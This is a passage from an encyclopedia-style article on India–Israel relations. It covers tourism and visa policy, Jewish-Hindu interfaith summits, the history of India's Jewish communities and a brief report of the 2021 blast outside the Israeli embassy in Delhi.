Israel has since observed a steady rise in the number of Indian tourists to the country. In a further effort to boost tourism from India, the Israeli government has simplified visa procedures for Indians who have previously obtained visas from Canada, Australia, the United States, the Schengen countries or Israel and have completed their travel to those countries. Visa processing fees for Indian applicants have also been reduced from 1,700 to 1,100. In 2017, Indian tourist arrivals in Israel rose by 31%, with over 60,000 tourists visiting the country that year. Israel planned to reach a target of over 100,000 Indian tourists in 2018.
Interfaith relations
In February 2007, the first Jewish-Hindu interfaith leadership summit was held in New Delhi. The summit included the then Chief Rabbi of Israel Yona Metzger, the American Jewish Committee's International Director of Interreligious Affairs David Rosen, a delegation of chief rabbis from around the world, and Hindu leaders from India. During the summit, Rabbi Metzger stated that "Jews have lived in India for over 2,000 years and have never been discriminated against. This is something unparalleled in human history."
In August 2007, amidst protests, a delegation of Indian Muslim leaders and journalists traveled to Israel. The visit was touted as a dialogue of democracies, and was organised by the American Jewish Committee's India office. During this trip, Maulana Jameel Ahmed Ilyasi, the then secretary-general of the All-India Association of Imams and Mosques, praised the mutual respect Israeli Arabs and Israeli Jews have for each other, and encouraged resolving problems by dialogue rather than violence. Muslim leaders met with then president Shimon Peres, where Peres highlighted the coexistence of religions in Jerusalem and India's struggle with terror and separatism.
In 2008, a second Hindu-Jewish summit took place in Jerusalem. Included in the summit was a meeting between Hindu groups and then Israeli President Shimon Peres, where the importance of a strong Israeli-Indian relationship was discussed. The Hindu delegation also met with Israeli politicians Isaac Herzog and Majalli Wahabi. Hindu groups visited and said their prayers at the Western Wall, and also paid their respects to Holocaust victims.
In 2009, a smaller Hindu-Jewish interfaith meeting organised by the Hindu American Foundation and the American Jewish Committee was held in New York City and Washington. Hindu and Jewish representatives gave presentations, and participants wore lapel pins combining the Israeli, Indian, and American flags.
In November 2012, Israeli President Shimon Peres remarked, "I think India is the greatest show of how so many differences in language, in sects can coexist facing great suffering and keeping full freedom."
In 2019, a large scale summit to further boost Hindu-Jewish cultural ties was organized by Indo-Israel Friendship Association in Mumbai. Many important leaders like Subramanian Swamy attended the event.
Judaism in India
The history of the Jewish people in India dates back to ancient times. Judaism was one of the first foreign religions to arrive in India in recorded history. Indian Jews are a religious minority of India, but unlike many parts of the world, have historically lived in India without any instances of antisemitism from the local majority populace, the Hindus. The better-established ancient communities have assimilated a large number of local traditions through cultural diffusion. The Jewish population in India is hard to estimate since each Jewish community is distinct with different origins; while some allegedly arrived during the time of the Kingdom of Judah, others are seen by some as descendants of Israel's Ten Lost Tribes. In addition to Jewish expatriates and recent immigrants, there are several distinct Jewish groups in India:
Cochin Jews, also called Malabar Jews, are of Mizrahi and Sephardi heritage. They are the oldest group of Jews in India, with possible roots claimed to date to the time of King Solomon. The Cochin Jews settled in the Kingdom of Cochin in South India.
The so-called "Spanish and Portuguese Jews", Paradesi Jews and British Jews arrived at Madras during the 16th century, mainly as traders and diamond businessmen. They also have a large presence in the former Portuguese colony of Goa, where the Goan Inquisition was initiated in 1560.
The Bene Israel arrived in the state of Maharashtra 900 years ago. Another branch of the Bene Israel community resided in Karachi until the Partition of India in 1947, when they fled to India (in particular Mumbai); many of them also moved to Israel. The Jews from the Sindh, Punjab and Pathan areas are often incorrectly called Bani Israel Jews. The Jewish communities who resided in other parts of what became Pakistan (such as Lahore or Peshawar) also fled to India in 1947, in a similar manner to the larger Karachi Jewish community.
The Baghdadi Jews arrived in the city of Surat from Iraq (and other Arab states), Iran and Afghanistan about 250 years ago.
The Bnei Menashe are Mizo and Kuki tribesmen in Manipur and Mizoram who are recent converts to Judaism.
The Bene Ephraim (also called "Telugu Jews") are a small group who speak Telugu; their observance of Judaism dates to 1981.
The majority of Indian Jews have "made aliyah" (migrated) to Israel since the creation of the modern state in 1948. Over 70,000 Indian Jews now live in Israel (over 1% of Israel's total population). Of the roughly 5,000 remaining in India, the largest community is concentrated in Mumbai, where about 3,500 remain of the over 30,000 Jews registered there in the 1940s, divided into Bene Israel and Baghdadi Jews, though the Baghdadi Jews refused to recognize the Bene Israel as Jews and withheld charity from them for that reason. Reminders of Jewish localities, such as synagogues, still remain in Kerala.
At the beginning of the 21st century, new Jewish communities were established in Mumbai, New Delhi, Bangalore, and other Indian cities by the Chabad-Lubavitch movement, which has sent rabbis to lead them. The communities serve the religious and social needs of Jewish business people who have immigrated to or are visiting India, and of Jewish backpackers touring the country. The largest centre is the Nariman House in Mumbai. There are currently 33 synagogues in India, although many no longer function as such and vary in their levels of preservation.
2021 Israeli embassy blast
A minor IED explosion took place outside the Israeli embassy in Delhi on 29 January 2021, as the two countries celebrated the 29th anniversary of India–Israel ties. Israel blamed Iran for the blast.
See also
Israelis in India
Indians in Israel
Indian Jews in Israel
Indian Jews
Hinduism in Israel
Foreign relations of India
International recognition of Israel
Foreign relations of Israel
Battle of Haifa (1918)
References
External links
Rediff Portal – Ariel Sharon's visit to India
India-Israel Fellowship
Indo-Judaic: Philosophy, Research, Studies and Cultural Community
The Changing nature of Israeli-Indian Relations:1948 – 2005
Jews of India
Jewish Indian history
Israel
Bilateral relations of Israel